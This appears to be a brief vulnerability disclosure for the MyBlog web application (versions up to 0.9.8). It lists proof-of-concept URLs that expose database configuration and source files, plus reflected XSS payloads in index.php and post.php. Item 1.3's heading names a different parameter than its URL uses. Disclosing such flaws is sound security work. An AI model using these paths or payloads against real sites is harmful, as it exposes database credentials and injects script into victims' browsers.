EXPLOIT : MyBlog <=0.9.8 Multiple Vulnerabilities

1. Exploits/POCs:
	1.1. Information Leakage. Database information disclosure in "/config/mysqlconnection.inc" and/or "/config/mysqlconnection%20-%20Copy.inc" or "/admin/setup.php".
		-------------
		http://[URL]/config/mysqlconnection.inc
		http://[URL]/config/mysqlconnection%20-%20Copy.inc
		http://[URL]/admin/setup.php
		-------------
	1.2. Reflected XSS attack in "index.php" in "sort" and "s" parameters.
		-------------
		http://[URL]/index.php?sort=<script>alert( String(/BugReport.ir XSS/).substr(1,16) );</script>
		http://[URL]/index.php?s=<script>alert( String(/BugReport.ir XSS/).substr(1,16) );</script>
		-------------
	1.3. Reflected XSS attack in "post.php" in "sort" parameter.
		-------------
		http://[URL]/post.php?id="<script>alert( String(/BugReport.ir XSS/).substr(1,16) );</script><br
		-------------
	1.4. Information Leakage. Source code disclosure in "/config/settings.inc".
		-------------
		http://[URL]/config/settings.inc
		-------------